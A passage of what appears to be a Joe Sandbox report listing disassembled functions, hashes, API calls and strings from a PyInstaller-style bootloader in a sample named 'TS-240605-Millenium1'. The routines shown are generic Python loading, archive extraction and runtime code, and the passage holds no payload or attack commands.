Instruction Fuzzy Hash: 9A412A52C0D68B46E966CD1C47016B41AA0AF337B2D585271FDDBB37CFCD0DA99AC211

Function 00007FF6CEB3AC50 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
Instruction ID: a6e4815120387bcb4e0777e38d771f90b93c9d2e76e8557a1f364291493c15ef
Opcode Fuzzy Hash: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
Instruction Fuzzy Hash: 4341D162B14A5582EF04CF2ADA55179B3A1FB59FD1B199032EE8DE7B58DF3CD4428300

Function 00007FF6CEB384BC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
Instruction ID: 0f77e469e3eeb219c746b3fc2b400d5127c70d79db0ba4cb0da6d085ca54c2b0
Opcode Fuzzy Hash: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
Instruction Fuzzy Hash: 8531D632B08B4282E714DF25664217E76A5AF96BE1F154239FADDA3BD6DF3CD0018304

Function 00007FF6CEB4A620 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
Instruction ID: 02599e414203625ec469bc581f72556ea4d280897c65da04ff7da4827f0d6256
Opcode Fuzzy Hash: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
Instruction Fuzzy Hash: ECF0C271B186928EEBAC8F28A90367977E4F718380F808539E6CCC3B14DB3C80608F04

Function 00007FF6CEB2CA9C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
Instruction ID: 997ddd35b3e435ee3119dc80d97de484f000d39a75d51787b99d2cd48559bd15
Opcode Fuzzy Hash: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
Instruction Fuzzy Hash: C2A001A2A08842D0F6448F00AA560302330BB7370AB410032E09EE14A8DE3CB8408A80

Function 00007FF6CEB253F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB25400
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB2543A
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB2545F
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB25484
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB254AC
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB254D4
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB254FC
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB25524
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB2554C
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CEB2344E), ref: 00007FF6CEB25574

Strings

Failed to get address for PyErr_Restore, xrefs: 00007FF6CEB256EE
Failed to get address for PyUnicode_Decode, xrefs: 00007FF6CEB25A0E
Failed to get address for PyImport_ImportModule, xrefs: 00007FF6CEB2578E
PyObject_SetAttrString, xrefs: 00007FF6CEB258B2
Py_InitializeFromConfig, xrefs: 00007FF6CEB254A2
Py_DecRef, xrefs: 00007FF6CEB253F6
Failed to get address for PyEval_EvalCode, xrefs: 00007FF6CEB25716
PyErr_Clear, xrefs: 00007FF6CEB2560A
Failed to get address for PyErr_Clear, xrefs: 00007FF6CEB25626
PyErr_Print, xrefs: 00007FF6CEB256AA
Failed to get address for PyList_Append, xrefs: 00007FF6CEB257B6
Failed to get address for PyConfig_Read, xrefs: 00007FF6CEB25586
PyConfig_Clear, xrefs: 00007FF6CEB2551A
PyModule_GetDict, xrefs: 00007FF6CEB25812
Py_ExitStatusException, xrefs: 00007FF6CEB25455
Failed to get address for PyStatus_Exception, xrefs: 00007FF6CEB2596E
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF6CEB258CE
PyErr_NormalizeException, xrefs: 00007FF6CEB2565A
PyObject_Str, xrefs: 00007FF6CEB258DA
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF6CEB25766
Failed to get address for PySys_SetObject, xrefs: 00007FF6CEB259BE
PyErr_Restore, xrefs: 00007FF6CEB256D2
Failed to get address for Py_ExitStatusException, xrefs: 00007FF6CEB25471
Py_IsInitialized, xrefs: 00007FF6CEB254CA
Failed to get address for PyUnicode_Replace, xrefs: 00007FF6CEB25AD6
PyObject_CallFunction, xrefs: 00007FF6CEB2583A
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF6CEB259E6
PyRun_SimpleStringFlags, xrefs: 00007FF6CEB2592A
PyConfig_SetWideStringList, xrefs: 00007FF6CEB255E2
PyMem_RawFree, xrefs: 00007FF6CEB257EA
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6CEB25902
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6CEB2591E
Py_Finalize, xrefs: 00007FF6CEB2547A
Failed to get address for PyConfig_SetString, xrefs: 00007FF6CEB255D6
Failed to get address for PyUnicode_FromString, xrefs: 00007FF6CEB25A86
Failed to get address for Py_DecodeLocale, xrefs: 00007FF6CEB2544C
Failed to get address for PyUnicode_Join, xrefs: 00007FF6CEB25AAE
PyList_Append, xrefs: 00007FF6CEB2579A
PyObject_GetAttrString, xrefs: 00007FF6CEB2588A
PyUnicode_FromString, xrefs: 00007FF6CEB25A6A
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF6CEB25946
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF6CEB257DE
PyImport_AddModule, xrefs: 00007FF6CEB25722
PyConfig_InitIsolatedConfig, xrefs: 00007FF6CEB25542
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF6CEB258A6
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF6CEB2555E
GetProcAddress, xrefs: 00007FF6CEB25419
Failed to get address for PyImport_AddModule, xrefs: 00007FF6CEB2573E
Failed to get address for Py_PreInitialize, xrefs: 00007FF6CEB2550E
Py_DecodeLocale, xrefs: 00007FF6CEB25430
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF6CEB254BE
Failed to get address for PyErr_Fetch, xrefs: 00007FF6CEB2564E
Failed to get address for Py_DecRef, xrefs: 00007FF6CEB25412
Failed to get address for PyErr_Print, xrefs: 00007FF6CEB256C6
PyConfig_SetString, xrefs: 00007FF6CEB255BA
Failed to get address for Py_IsInitialized, xrefs: 00007FF6CEB254E6
PyMarshal_ReadObjectFromString, xrefs: 00007FF6CEB257C2
PyErr_Fetch, xrefs: 00007FF6CEB25632
PyUnicode_Decode, xrefs: 00007FF6CEB259F2
Failed to get address for PyConfig_Clear, xrefs: 00007FF6CEB25536
PyUnicode_FromFormat, xrefs: 00007FF6CEB25A42
PySys_SetObject, xrefs: 00007FF6CEB259A2
PyUnicode_DecodeFSDefault, xrefs: 00007FF6CEB25A1A
Failed to get address for PyMem_RawFree, xrefs: 00007FF6CEB25806
Failed to get address for PySys_GetObject, xrefs: 00007FF6CEB25996
PyConfig_SetBytesString, xrefs: 00007FF6CEB25592
PyStatus_Exception, xrefs: 00007FF6CEB25952
PySys_GetObject, xrefs: 00007FF6CEB2597A
Failed to get address for Py_Finalize, xrefs: 00007FF6CEB25496
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF6CEB25A5E
PyUnicode_Replace, xrefs: 00007FF6CEB25ABA
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF6CEB25A36
PyUnicode_Join, xrefs: 00007FF6CEB25A92
Failed to get address for PyObject_Str, xrefs: 00007FF6CEB258F6
PyImport_ExecCodeModule, xrefs: 00007FF6CEB2574A
PyEval_EvalCode, xrefs: 00007FF6CEB256FA
PyImport_ImportModule, xrefs: 00007FF6CEB25772
PyConfig_Read, xrefs: 00007FF6CEB2556A
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF6CEB255AE
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF6CEB2587E
PyObject_CallFunctionObjArgs, xrefs: 00007FF6CEB25862
PyErr_Occurred, xrefs: 00007FF6CEB25682
PyUnicode_AsUTF8, xrefs: 00007FF6CEB259CA
Failed to get address for PyObject_CallFunction, xrefs: 00007FF6CEB25856
Failed to get address for PyModule_GetDict, xrefs: 00007FF6CEB2582E
Failed to get address for PyErr_Occurred, xrefs: 00007FF6CEB2569E
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF6CEB255FE
Py_PreInitialize, xrefs: 00007FF6CEB254F2
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF6CEB25676

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
Instruction ID: 91b25e5436870952f57aa170b4daf364c0d4ca7fcb48594fbb996e397cfcced8
Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
Instruction Fuzzy Hash: E312C165E0EB0390FA158F05EB9917463B1AF37747B945436F8CEA63A4EF7CB5488202

Function 00007FF6CEB212A0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CEB22B10: MessageBoxW.USER32 ref: 00007FF6CEB22BE5

_fread_nolock.LIBCMT ref: 00007FF6CEB21489

Strings

fread, xrefs: 00007FF6CEB214B6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6CEB212EE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6CEB21360
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6CEB2131B
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6CEB214AF
fseek, xrefs: 00007FF6CEB21322
%s%c%s, xrefs: 00007FF6CEB213DE
malloc, xrefs: 00007FF6CEB21367
\, xrefs: 00007FF6CEB213E5

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: 1f64e21f2ee06bf2ae5728024b8ca0aea1db7afc2fc74e32ddaba13588a02f72
Instruction ID: de31e9cc568e455da15e20862782c3ac0fcfe1bf77776765b6aac6beacca5ace
Opcode Fuzzy Hash: 1f64e21f2ee06bf2ae5728024b8ca0aea1db7afc2fc74e32ddaba13588a02f72
Instruction Fuzzy Hash: 5F51C362A0968346FA20AF11A6552FA6374EF76BC5F404132FEDDE7A95EE3CF5018700

Function 00007FF6CEB223D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6CEB223FB
SelectObject.GDI32 ref: 00007FF6CEB22442
DrawTextW.USER32 ref: 00007FF6CEB22465
SelectObject.GDI32 ref: 00007FF6CEB2247B
ReleaseDC.USER32 ref: 00007FF6CEB2248B
MoveWindow.USER32 ref: 00007FF6CEB224DB
MoveWindow.USER32 ref: 00007FF6CEB2251B
MoveWindow.USER32 ref: 00007FF6CEB2256E
MoveWindow.USER32 ref: 00007FF6CEB225B6

Strings

P%, xrefs: 00007FF6CEB2244F

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
Instruction ID: 10a89bfbec0b45b43f3417cb6a11f7c93af732cd47f429f09c930462704b43a8
Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
Instruction Fuzzy Hash: E951F836614BA186D6349F26E4181BAB7B1FBA9B66F004122EFDE83794DF3CD045DB10

Function 00007FF6CEB36CE0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB36D23
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB37110
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB373AC

Strings

-, xrefs: 00007FF6CEB36DB9
p, xrefs: 00007FF6CEB36E4D
f, xrefs: 00007FF6CEB36E45
p, xrefs: 00007FF6CEB36DD5
:, xrefs: 00007FF6CEB36EDC

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
Instruction ID: 8a6eb87cda94f9f7e82aad87d11cf78360f828c828924473eea9ee9dc3e6991e
Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
Instruction Fuzzy Hash: 6812B422A0C36387FB209E14D35667AB671FB62752F944035F6DAA76C4DF3CE4908B10

Function 00007FF6CEB318F8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB31938
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB31D00
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB31F9F

Strings

f, xrefs: 00007FF6CEB319D0
f, xrefs: 00007FF6CEB31B85
p, xrefs: 00007FF6CEB319DD
f, xrefs: 00007FF6CEB31A3A
p, xrefs: 00007FF6CEB31A42

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
Instruction ID: aa6c17b70efe562ee379d920a9d61ff2e14bb0fd2b1a31fe040da66aa63e8caf
Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
Instruction Fuzzy Hash: 581292A3E0D15387FB609E14E256279767AEBA2752F944131F6DDA7AC4DF3CE4808B00

Function 00007FF6CEB21590 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6CEB216B9
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6CEB215C3
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6CEB21629
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6CEB215F9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6CEB216B2
fseek, xrefs: 00007FF6CEB21600
malloc, xrefs: 00007FF6CEB21630

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 98d933ec4259691fc6dfc760f975a8669145de4ba037c576ca538a9cc007f247
Instruction ID: 986797e6a9b22a2bc9f192a17e978f652261fd06f540b24999234ed15b81c84d
Opcode Fuzzy Hash: 98d933ec4259691fc6dfc760f975a8669145de4ba037c576ca538a9cc007f247
Instruction Fuzzy Hash: CD318422B0864346FA21DF52A6455BA63B0EF36BD5F444032EECDA7A56DE3CF5458700

Function 00007FF6CEB2F330 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6CEB2F38C

Part of subcall function 00007FF6CEB302EC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6CEB3032F
Part of subcall function 00007FF6CEB302EC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6CEB30354

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6CEB2F464
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6CEB2F6B3
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CEB2F7BF

Strings

csm, xrefs: 00007FF6CEB2F40D
csm, xrefs: 00007FF6CEB2F3A6
csm, xrefs: 00007FF6CEB2F487

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
Instruction ID: 4b3440b77ed67f5d34fb4bbd6bd5fbcc2c7e5b88dc43495b59d3d631fb9d0e95
Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
Instruction Fuzzy Hash: 07D17D32A0874286EB209F6596452BD77B0FF66799F100235FA8DA7B69DF38E491C700

Function 00007FF6CEB289B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28A47
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28A9E

Strings

WideCharToMultiByte, xrefs: 00007FF6CEB28AE6
win32_utils_to_utf8, xrefs: 00007FF6CEB28AD6
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6CEB28AC6
